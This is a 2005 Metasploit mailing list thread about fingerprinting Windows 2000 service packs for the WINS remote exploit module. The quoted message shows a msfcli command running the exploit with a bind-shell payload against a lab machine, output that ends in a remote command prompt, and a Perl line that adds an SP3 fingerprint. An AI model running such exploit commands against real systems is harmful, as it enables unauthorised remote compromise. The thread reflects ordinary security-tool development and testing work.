Metasploit mailing list archives
WINS Fingerprint update
From: hdm at metasploit.com (H D Moore)
Date: Wed, 12 Jan 2005 19:31:39 -0600
It is strange the those addresses are the same between service packs. They should point to a location inside ntdll.dll, which changes quite a bit between each SP of Windows 2000. If you get a chance, could you mail me a copy (off-list) of your ntdll.dll file? Thanks! -HD On Wednesday 12 January 2005 19:21, grutz at jingojango.net wrote:
On Wed, Jan 12, 2005 at 02:47:31PM -0800, grutz at jingojango.net brazenly
wrote:
I didn't have SP4 handy to put on the vm image.Just put SP4 on Win2KAS and results are the same: $ ./msfcli wins RHOST=192.168.191.10 PAYLOAD=win32_bind TARGET=0 E [*] Starting Bind Handler. [*] Pointers: [0x05371e90] 0x053dffa4 0x77f98191 0x77f89640 [*] Attempting to overwrite 0x053df4c4 with 0x053922e0 (0x05391f40) [*] Got connection from 192.168.191.1:3773 <-> 192.168.191.10:4444 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32> So for Win2KASsp3, added this line: $sp = '3' if $ptrs[3] == 0x77f81648; # add for Win2K Advanced Server, SP3
Current thread:
- WINS Fingerprint update grutz at jingojango.net (Jan 12)
- WINS Fingerprint update grutz at jingojango.net (Jan 12)
- WINS Fingerprint update H D Moore (Jan 12)
- WINS Fingerprint update grutz at jingojango.net (Jan 12)